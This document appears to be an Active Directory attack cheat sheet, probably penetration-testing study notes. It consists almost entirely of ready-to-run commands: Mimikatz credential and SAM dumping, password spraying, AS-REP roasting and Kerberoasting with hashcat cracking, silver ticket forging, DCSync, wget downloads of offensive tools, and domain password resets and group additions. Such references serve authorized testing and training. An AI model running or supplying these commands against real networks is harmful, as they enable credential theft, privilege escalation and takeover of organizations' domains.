Attack
Mimikatz.exe
NOTE: Make sure to run PowerShell as Administrator
Launch Mimikatz.exe
C:\Tools\mimikatz.exeLocal Privilege Escalate
privilege::debugDisplay Logged On Users NTLM Passwords
sekurlsa::logonpasswordsDisplay Local User NTLM Passwords
lsadump::samOne liner
.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "sekurlsa::logonpasswords" "exit"Enumeration
To view account policy
net accountsPassword Attacks
Spray-Passwords.ps1 (Target Machine)
C:\Tools\Spray-Passwords.ps1 -Pass <Password> -Admincrackmapexec (Kali)
crackmapexec smb <Target IP Address> -u <Username Lists> -p '<Password>' -d <Domain Name> --continue-on-successNOTE: If the output of crackmapexec includes "Pwn3d!", it indicates that the user has Administrative privileges on that machine
Kerbrute_windows_amd64.exe (Target Machine)
C:\Tools\kerbrute_windows_amd64.exe passwordspray -d <Domain Name> <Username Lists> "<Password>"AS-REP Roasting
Impacket-GetNPUsers (Kali)
Get the users and their hashed password that has "Do not require Kerberos Preauthentication enabled"
impacket-GetNPUsers <DOMAIN NAME>/ -dc-ip <DC IP Address> -usersfile <Username Lists> -format hashcat -outputfile asrep_hashes.txt -no-passCrack the hashed password
sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --forceRubeus (Target Machine)
Get the users and their hashed password that has "Do not require Kerberos Preauthentication enabled"
C:\Tools\Rubeus.exe asreproast /nowrapCrack the hashed password
sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --forceKerberoasting
Impacket-GetNPUsers (Kali)
Get service hashed password
sudo impacket-GetUserSPNs -dc-ip <DC IP Address> -request -outputfile hashes.kerberoast <Domain Name>/<Username>Crack the hashed password
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --forceRubeus (Target Machine)
Get service hashed password
C:\Tools\Rubeus.exe kerberoast /outfile:hashes.kerberoastCrack the hashed password
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --forceSilver Tickets
NOTE: Information needed
SPN password hash
Domain SID
Target SPN
Get SPN password hash from mimikatz.exe
C:\Tools\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
*Retrieve NTLM hashGet Domain SID from user
whoami /user
Remove the numbers after the last -EXAMPLE:
PS C:\Windows\system32> whoami /user USER INFORMATION ---------------- User Name SID ========= ============================================= corp\jeff S-1-5-21-1987370270-658905905-1781884369-1105 # Domain SID = S-1-5-21-1987370270-658905905-1781884369
Get Target SPN from PowerView.ps1
Import-Module C:\Tools\PowerView.ps1
Get-NetUser -SPN | select samaccountname, serviceprincipalnameTo forge the silver ticket in mimikatz.exe
kerberos::golden /sid:<Domain SID> /domain:<Domain Name> /ptt /target:<SPN Name> /server:<SPN Server> /rc4:<SPN Password Hash> /user:<Domain User>EXAMPLE:
kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin
Dcsync
Mimikatz.exe (Target Machine)
To obtain the hash
lsadump::dcsync /user:<Domain Name>\<Username>To crack it
hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --forceImpacket-secretsdump
impacket-secretsdump -just-dc-user <DC Username> corp.com/<Username>:'<Password>'@<DC IP Address>NOTE: Get the NTLM hash from DRSUAPI method located before the ending trail of :
To crack it
hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --forceExploits
SharpGPOAbuse.exe
wget https://github.com/byronkg/SharpGPOAbuse/raw/refs/heads/main/SharpGPOAbuse-master/SharpGPOAbuse.exeChange password
NOTE: Must have permission on the user
net user <Username> <New Password> /domainSet-ADAccountPassword -Identity "<Username>" -NewPassword (ConvertTo-SecureString "<New Password>" -AsPlainText -Force) -ResetGUI
runas /user:<Domain Name>\<Username> cmd.exeCLI
wget https://raw.githubusercontent.com/antonioCoco/RunasCs/refs/heads/master/Invoke-RunasCs.ps1Add user to group
NOTE: Must have permission on the group
net group "<Group Name>" <Username> /add /domainLast updated